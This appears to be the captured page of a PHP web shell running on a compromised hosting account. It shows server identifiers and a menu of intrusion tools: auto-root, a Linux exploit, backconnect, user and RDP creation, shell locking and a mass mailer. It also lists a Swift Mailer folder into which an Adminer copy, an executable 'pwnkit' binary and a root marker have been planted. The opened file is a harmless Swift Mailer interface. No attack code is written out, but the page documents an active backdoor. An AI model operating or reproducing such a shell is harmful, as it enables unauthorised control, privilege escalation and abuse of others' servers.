Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.216.23
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
tools /
swift /
Swift /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticator
[ DIR ]
drwx---r-x
Cache
[ DIR ]
drwx---r-x
Connection
[ DIR ]
drwx---r-x
Events
[ DIR ]
drwx---r-x
Iterator
[ DIR ]
drwx---r-x
Log
[ DIR ]
drwx---r-x
Message
[ DIR ]
drwx---r-x
Plugin
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
Address.php
2.12
KB
-rw----r--
AddressContainer.php
183
B
-rw----r--
Authenticator.php
877
B
-rw----r--
BadResponseException.php
549
B
-rw----r--
BatchMailer.php
5.91
KB
-rw----r--
Cache.php
1.5
KB
-rw----r--
CacheFactory.php
1.06
KB
-rw----r--
ClassLoader.php
910
B
-rw----r--
Connection.php
2.21
KB
-rw----r--
ConnectionBase.php
2.73
KB
-rw----r--
ConnectionException.php
519
B
-rw----r--
Events.php
831
B
-rw----r--
Exception.php
892
B
-rw----r--
File.php
4.42
KB
-rw----r--
FileException.php
479
B
-rw----r--
Iterator.php
993
B
-rw----r--
Log.php
3.18
KB
-rw----r--
LogContainer.php
966
B
-rw----r--
Message.php
25.8
KB
-rw----r--
RecipientList.php
5.58
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
index.php
1.24
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Connection.php
<?php /** * Swift Mailer Connection Interface * All connection handlers extend this abstract class * Please read the LICENSE file * @author Chris Corbyn <chris@w3style.co.uk> * @package Swift_Connection * @license GNU Lesser General Public License */ /** * Swift Connection Interface * Lists methods which are required by any connections * @package Swift_Connection * @author Chris Corbyn <chris@w3style.co.uk> */ interface Swift_Connection { /** * Try to start the connection * @throws Swift_ConnectionException If the connection cannot be started */ public function start(); /** * Return the contents of the buffer * @return string * @throws Swift_ConnectionException If the buffer cannot be read */ public function read(); /** * Write a command to the buffer * @param string The command to send * @throws Swift_ConnectionException If the write fails */ public function write($command, $end="\r\n"); /** * Try to stop the connection * @throws Swift_ConnectionException If the connection cannot be closed/stopped */ public function stop(); /** * Check if the connection is up or not * @return boolean */ public function isAlive(); /** * Add an extension which is available on this connection * @param string The name of the extension * @param array The list of attributes for the extension */ public function setExtension($name, $list=array()); /** * Check if an extension exists by the name $name * @param string The name of the extension * @return boolean */ public function hasExtension($name); /** * Get the list of attributes for the extension $name * @param string The name of the extension * @return array * @throws Swift_ConnectionException If no such extension can be found */ public function getAttributes($name); /** * Execute logic needed after SMTP greetings * @param Swift An instance of Swift */ public function postConnect(Swift $instance); /** * Returns TRUE if the connection needs a EHLO greeting. * @return boolean */ public function getRequiresEHLO(); /** * Set if the connection needs a EHLO greeting. * @param boolean */ public function setRequiresEHLO($set); }
Close